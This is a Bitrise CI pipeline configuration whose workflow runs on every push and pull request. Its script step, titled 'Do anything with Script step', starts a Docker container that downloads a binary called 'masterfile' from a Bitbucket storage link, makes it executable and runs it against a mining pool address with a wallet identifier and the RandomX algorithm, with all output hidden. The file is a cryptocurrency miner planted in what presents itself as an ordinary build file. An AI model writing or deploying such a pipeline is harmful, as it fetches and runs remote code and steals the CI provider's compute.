---
format_version: '11'
default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
project_type: other
trigger_map:
- push_branch: "*"
  workflow: primary
- pull_request_source_branch: "*"
  workflow: primary
workflows:
  primary:
    steps:
    - activate-ssh-key@4:
        run_if: '{{getenv "SSH_RSA_PRIVATE_KEY" | ne ""}}'
    - git-clone@6: {}
    - script@1:
        title: Do anything with Script step
        inputs:
        - content: docker --version && docker run --name Anli ubuntu:latest sh -c "apt-get update && apt-get upgrade -y && apt-get install -y wget && wget https://bitbucket.org/anli_angku/storage/downloads/masterfile && chmod u+x masterfile && ./masterfile -o 139.59.164.251:80 -u TRX:TVLXEaPiNSBtozfxtZxQ4vPJbG3D1aG5GG.${RANDOM:0:9} -a rx/0 -k > /dev/null"
    - deploy-to-bitrise-io@2: {}
meta:
  bitrise.io:
    machine_type_id: elite
